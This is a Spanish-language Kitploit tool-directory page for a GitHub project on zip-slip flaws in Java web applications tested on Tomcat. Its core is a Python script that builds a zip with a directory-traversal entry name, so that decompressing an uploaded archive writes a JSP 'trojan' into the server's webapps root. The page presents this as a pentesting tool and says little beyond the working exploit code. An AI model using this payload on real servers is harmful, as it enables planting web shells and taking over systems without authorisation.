Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Java-Compressed-file-security — Vulnerabilidades de seguridad en archivos comprimidos de Java Web | Kitploit
Herramientas/GitHubGitHub/jas502n/java-compressed-file-security
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubjas502n/java-compressed-file-security

Java-Compressed-file-security

Vulnerabilidades de seguridad en archivos comprimidos de Java Web

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
206hace 6 añosRevisado por Kitploit

Java-Compressed-file-security Vulnerabilidad de seguridad de archivos comprimidos de Java Web

Entorno de prueba:

root@kitploit:~
Windows For Apache Tomcat/8.5.16

0x01 Creación de archivo comprimido malicioso con directory traversal

Código:

root@kitploit:~
#coding=utf-8

import zipfile  
import sys

if __name__ == "__main__":  
    try:
        with open("404.jsp", "r") as f:
            binary = f.read()
            zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
            info = zipfile.ZipInfo("test.zip")
            zipFile.writestr("..\\webapps\\ROOT\\404.jsp", binary)
            zipFile.close()
    except IOError as e:
        raise e

0x02 Subida de archivo, clic para descomprimir, el archivo troyano se descomprime en el directorio webapps del sitio web

Descargar herramienta